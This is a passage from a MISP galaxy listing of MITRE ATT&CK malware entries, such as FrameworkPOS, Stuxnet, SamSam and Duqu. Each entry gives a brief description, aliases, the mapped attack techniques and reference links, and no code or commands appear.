uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4734. Table References
Links
https://attack.mitre.org/software/S0053
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

FrameworkPOS - S0503

[FrameworkPOS](https://attack.mitre.org/software/S0503) is a point of sale (POS) malware used by [FIN6](https://attack.mitre.org/groups/G0037) to steal payment card data from sytems that run physical POS devices.(Citation: SentinelOne FrameworkPOS September 2019)

The tag is: misp-galaxy:mitre-malware="FrameworkPOS - S0503"

FrameworkPOS - S0503 is also known as:

FrameworkPOS
Trinity

View relationships graph

FrameworkPOS - S0503 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 4735. Table References
Links
https://attack.mitre.org/software/S0503
https://labs.sentinelone.com/fin6-frameworkpos-point-of-sale-malware-analysis-internals-2/

Melcoz - S0530

[Melcoz](https://attack.mitre.org/software/S0530) is a banking trojan family built from the open source tool Remote Access PC. [Melcoz](https://attack.mitre.org/software/S0530) was first observed in attacks in Brazil and since 2018 has spread to Chile, Mexico, Spain, and Portugal.(Citation: Securelist Brazilian Banking Malware July 2020)

The tag is: misp-galaxy:mitre-malware="Melcoz - S0530"

Melcoz - S0530 is also known as:

Melcoz

View relationships graph

Melcoz - S0530 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Spearphishing Link - T1566.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Software Packing - T1027.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 4736. Table References
Links
https://attack.mitre.org/software/S0530
https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

zwShell - S0350

[zwShell](https://attack.mitre.org/software/S0350) is a remote access tool (RAT) written in Delphi that has been used by [Night Dragon](https://attack.mitre.org/groups/G0014).(Citation: McAfee Night Dragon)

The tag is: misp-galaxy:mitre-malware="zwShell - S0350"

zwShell - S0350 is also known as:

zwShell

View relationships graph

zwShell - S0350 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1021.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Owner/User Discovery - T1033" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

Table 4737. Table References
Links
https://attack.mitre.org/software/S0350
https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf

BONDUPDATER - S0360

[BONDUPDATER](https://attack.mitre.org/software/S0360) is a PowerShell backdoor used by [OilRig](https://attack.mitre.org/groups/G0049). It was first observed in November 2017 during targeting of a Middle Eastern government organization, and an updated version was observed in August 2018 being used to target a government organization with spearphishing emails.(Citation: FireEye APT34 Dec 2017)(Citation: Palo Alto OilRig Sep 2018)

The tag is: misp-galaxy:mitre-malware="BONDUPDATER - S0360"

BONDUPDATER - S0360 is also known as:

BONDUPDATER

View relationships graph

BONDUPDATER - S0360 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 4738. Table References
Links
https://attack.mitre.org/software/S0360
https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html
https://unit42.paloaltonetworks.com/unit42-oilrig-uses-updated-bondupdater-target-middle-eastern-government/

FLASHFLOOD - S0036

[FLASHFLOOD](https://attack.mitre.org/software/S0036) is malware developed by [APT30](https://attack.mitre.org/groups/G0013) that allows propagation and exfiltration of data over removable devices. [APT30](https://attack.mitre.org/groups/G0013) may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)

The tag is: misp-galaxy:mitre-malware="FLASHFLOOD - S0036"

FLASHFLOOD - S0036 is also known as:

FLASHFLOOD

View relationships graph

FLASHFLOOD - S0036 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Removable Media - T1025" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 4739. Table References
Links
https://attack.mitre.org/software/S0036
https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf

SHOTPUT - S0063

[SHOTPUT](https://attack.mitre.org/software/S0063) is a custom backdoor used by [APT3](https://attack.mitre.org/groups/G0022). (Citation: FireEye Clandestine Wolf)

The tag is: misp-galaxy:mitre-malware="SHOTPUT - S0063"

SHOTPUT - S0063 is also known as:

SHOTPUT
Backdoor.APT.CookieCutter
Pirpi

View relationships graph

SHOTPUT - S0063 has relationships with:

similar: misp-galaxy:tool="Pirpi" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 4740. Table References
Links
https://attack.mitre.org/software/S0063
https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html
https://www.fireeye.com/blog/threat-research/2014/06/clandestine-fox-part-deux.html

Nebulae - S0630

[Nebulae](https://attack.mitre.org/software/S0630) Is a backdoor that has been used by [Naikon](https://attack.mitre.org/groups/G0019) since at least 2020.(Citation: Bitdefender Naikon April 2021)

The tag is: misp-galaxy:mitre-malware="Nebulae - S0630"

Nebulae - S0630 is also known as:

Nebulae

View relationships graph

Nebulae - S0630 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

Table 4741. Table References
Links
https://attack.mitre.org/software/S0630
https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-NAIKON-creat5397-en-EN.pdf

Stuxnet - S0603

[Stuxnet](https://attack.mitre.org/software/S0603) was the first publicly reported piece of malware to specifically target industrial control systems devices. [Stuxnet](https://attack.mitre.org/software/S0603) is a large and complex piece of malware that utilized multiple different behaviors including multiple zero-day vulnerabilities, a sophisticated Windows rootkit, and network infection routines.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: CISA ICS Advisory ICSA-10-272-01)(Citation: ESET Stuxnet Under the Microscope)(Citation: Langer Stuxnet) [Stuxnet](https://attack.mitre.org/software/S0603) was discovered in 2010, with some components being used as early as November 2008.(Citation: Symantec W.32 Stuxnet Dossier)

The tag is: misp-galaxy:mitre-malware="Stuxnet - S0603"

Stuxnet - S0603 is also known as:

Stuxnet
W32.Stuxnet

View relationships graph

Stuxnet - S0603 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1091" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Token Impersonation/Theft - T1134.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SQL Stored Procedures - T1505.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Taint Shared Content - T1080" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Shared Modules - T1129" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Default Accounts - T1078.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Execution Guardrails - T1480" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

Table 4742. Table References
Links
https://attack.mitre.org/software/S0603
https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf [https://www.wired.com/images_blogs/threatlevel/2010/11/w32_stuxnet_dossier.pdf ]
https://us-cert.cisa.gov/ics/advisories/ICSA-10-272-01
https://www.esetnod32.ru/company/viruslab/analytics/doc/Stuxnet_Under_the_Microscope.pdf
https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf

HAMMERTOSS - S0037

[HAMMERTOSS](https://attack.mitre.org/software/S0037) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2015. (Citation: FireEye APT29) (Citation: F-Secure The Dukes)

The tag is: misp-galaxy:mitre-malware="HAMMERTOSS - S0037"

HAMMERTOSS - S0037 is also known as:

HAMMERTOSS
HammerDuke
NetDuke

View relationships graph

HAMMERTOSS - S0037 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003" with estimative-language:likelihood-probability="almost-certain"

Table 4743. Table References
Links
https://attack.mitre.org/software/S0037
https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf
https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

ASPXSpy - S0073

[ASPXSpy](https://attack.mitre.org/software/S0073) is a Web shell. It has been modified by [Threat Group-3390](https://attack.mitre.org/groups/G0027) actors to create the ASPXTool version. (Citation: Dell TG-3390)

The tag is: misp-galaxy:mitre-malware="ASPXSpy - S0073"

ASPXSpy - S0073 is also known as:

ASPXSpy
ASPXTool

View relationships graph

ASPXSpy - S0073 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

Table 4744. Table References
Links
https://attack.mitre.org/software/S0073
https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

SamSam - S0370

[SamSam](https://attack.mitre.org/software/S0370) is ransomware that appeared in early 2016. Unlike some ransomware, its variants have required operators to manually interact with the malware to execute some of its core components.(Citation: US-CERT SamSam 2018)(Citation: Talos SamSam Jan 2018)(Citation: Sophos SamSam Apr 2018)(Citation: Symantec SamSam Oct 2018)

The tag is: misp-galaxy:mitre-malware="SamSam - S0370"

SamSam - S0370 is also known as:

SamSam
Samas

View relationships graph

SamSam - S0370 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4745. Table References
Links
https://attack.mitre.org/software/S0370
https://www.us-cert.gov/ncas/alerts/AA18-337A
https://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html
https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/SamSam-ransomware-chooses-Its-targets-carefully-wpna.pdf
https://www.symantec.com/blogs/threat-intelligence/samsam-targeted-ransomware-attacks

StoneDrill - S0380

[StoneDrill](https://attack.mitre.org/software/S0380) is wiper malware discovered in destructive campaigns against both Middle Eastern and European targets in association with [APT33](https://attack.mitre.org/groups/G0064).(Citation: FireEye APT33 Sept 2017)(Citation: Kaspersky StoneDrill 2017)

The tag is: misp-galaxy:mitre-malware="StoneDrill - S0380"

StoneDrill - S0380 is also known as:

StoneDrill
DROPSHOT

View relationships graph

StoneDrill - S0380 has relationships with:

uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Virtualization/Sandbox Evasion - T1497" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Security Software Discovery - T1518.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Content Wipe - T1561.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"

Table 4746. Table References
Links
https://attack.mitre.org/software/S0380
https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html
https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07180722/Report_Shamoon_StoneDrill_final.pdf

Duqu - S0038

[Duqu](https://attack.mitre.org/software/S0038) is a malware platform that uses a modular approach to extend functionality after deployment within a target network. (Citation: Symantec W32.Duqu)

The tag is: misp-galaxy:mitre-malware="Duqu - S0038"

Duqu - S0038 is also known as:

Duqu

View relationships graph

Duqu - S0038 has relationships with:

similar: misp-galaxy:tool="Duqu" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Window Discovery - T1010" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1055.012" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Dynamic-link Library Injection - T1055.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Msiexec - T1218.007" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 4747. Table References
Links
https://attack.mitre.org/software/S0038
https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Misdat - S0083

[Misdat](https://attack.mitre.org/software/S0083) is a backdoor that was used by [Dust Storm](https://attack.mitre.org/groups/G0031) from 2010 to 2011. (Citation: Cylance Dust Storm)

The tag is: misp-galaxy:mitre-malware="Misdat - S0083"

Misdat - S0083 is also known as:

Misdat

View relationships graph

Misdat - S0083 has relationships with:

similar: misp-galaxy:malpedia="Misdat" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Timestomp - T1070.006" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 4748. Table References
Links
https://attack.mitre.org/software/S0083
https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf

Adups - S0309

[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. (Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)

